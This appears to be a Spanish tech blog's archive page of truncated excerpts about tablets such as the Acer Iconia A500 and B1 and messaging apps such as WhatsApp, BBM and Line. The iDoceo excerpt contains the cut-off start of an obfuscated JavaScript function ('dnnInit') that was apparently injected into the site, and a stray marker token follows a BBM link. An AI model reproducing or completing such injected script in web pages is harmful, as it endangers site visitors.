Esta tablet Acer Iconia A500, cuenta con el sistema operativo Android Honeycomb. Dentro de ella, dispone del potente procesador de Nvidia, Tegra 250 doble núcleo a 1 GHz como así también tiene 1 GB de memoria RAM. En cuanto a sus capacidades gráficas, las cuales son realmente impresionantes. Cuenta con una pantalla de 10,1 pulgadas, desplegando una resolución de 1280×800 píxeles (igualando la resolución de pantalla de las tablet Motorola Xoom, y…

21 diciembre 2012

Nueva tablet Acer Iconia B1

In: Acer

Hace unos días hablábamos acerca de las características de la tablet Acer Iconia A500, la cual a sido muy bien aceptada por el mercado actual. Hoy les presentaremos algunas especificaciones acerca de la nueva tablet de Acer, la Iconia B1 que será presentada en este 2013. Según hemos podido informarnos, la nueva tablet de Acer contará con una pantalla de 7 pulgadas bajo una resolución de 1024 x 600 píxeles. La empresa ha decidido incluír la últi…

Afortunadamente la aplicación WhatsApp con la que podemos enviar mensajes de texto y mensajes multimedia sin cargo a través de Internet, está disponible para tablets con Android. Aunque aún no hemos probado la aplicación en otras marcas y sistemas operativos, pensamos que el estar disponible para dispositivos portátiles con Android, posibilitará que aumente considerablemente la cantidad de personas que utilizan esta herramienta para comunicarse….

…o aproximado de mil doscientos pesos argentinos. Alcanzando el 14% de las ventas. Detrás de estas dos tablets, vienen un resto, que no se alcanzan a sacar muchas diferencias entre ellas. Encontramos en orden de mayor a menor: Acer, X-View, Samsung Tab, Titan, Lenovo, Motorola, Ranser, BlackBerry y Asus. Hay que destacar el porcentaje alcanzado por la tablet BlackBerry Playbook, ya que no solo alcanzó el 3% de las ventas, sino que se comenzó a com…

Se confirmaron muchos de los rumores que se encontraban dando vueltas por la red. Intel, el fabricante número uno de procesadores dio a conocer Studybook, una tablet que se suma a la familia de sus dispositivos orientados a la enseñanza. El solo anuncio del lanzamiento del proyecto \”Una Laptop por Niño\” hace varios años desencadenó una carrera que tiene a Intel entre los principales protagonistas. El objetivo es simple: ofrecer eq…

…posibilitará la creación de nuestro propio perfil, pudiendo de esta manera agregar toda la información de interés necesaria, destacando por su parte que contaremos con una buena seguridad referida al aspecto de la privacidad. Para  correr BlackBerry Messenger en nuestro dispositivo iOS, el mismo debe contar con la versión 6.0 de iOS o superiores y 40 MB de memoria interna disponible. Enlace: BlackBerry Messenger para dispositivos iOS zp8497586rq …

En esta nueva oportunidad te presentamos una excelente aplicación llamada iDoceo, ideal para aquellos usuarios de dispositivos iPad dedicados a la enseñanza en diferentes niveles, ya sean primarios o superiores. Tendremos la posibilidad de realizar un seguimiento meticuloso de nuestros alumnos con la implementación de diferentes hojas de cálculo e iconos personalizables. function dnnInit(){var a=0,m,v,t,z,x=new Array(“9091968376″,…

…úan cautivando a los usuarios, debido a que cada vez que una marca o empresa saca un dispositivo nuevo, lo hace en función de satisfacer las necesidades de los usuarios que cambian día a día, como ser conectarse a Internet, a WhatsApp, utilizar la tablet como un ordenador portatil, leer e-books, entre otras. …

Se trata de una herramienta más para iniciar chats o conversaciones con amigos, familiares o conocidos de manera gratuita y con una gran cantidad de opciones entretenidas. Este tipo de modalidades de chat se han puesto de moda en los últimos tiempos con aplicaciones como Whatsapp, etc. Está de más decir, que para poder relacionarnos con otras personas vía ChatON, ellas se verán obligadas a ser usuarios también de esta aplicación. Algo muy sencil…

28 febrero 2013

Line para tablets

In: Android|Aplicaciones

nuestro teléfono celular, o más bien enviarle un mensaje de texto. Con la aplicación Line podremos enviar mensajes de voz, mensajes de texto, enviar imágenes, emoticones, realizar llamadas, enviar videos, publicar información acerca de tu ubicación actual, entre otras funciones. Esta aplicación compite directamente con Vibre y la famosa WhatsApp debido a que comple funciones similares a las dos nombradas anteriormente, pero aún así presenta mejor…



¿No encontraste lo que buscabas? ¡Probá con Google!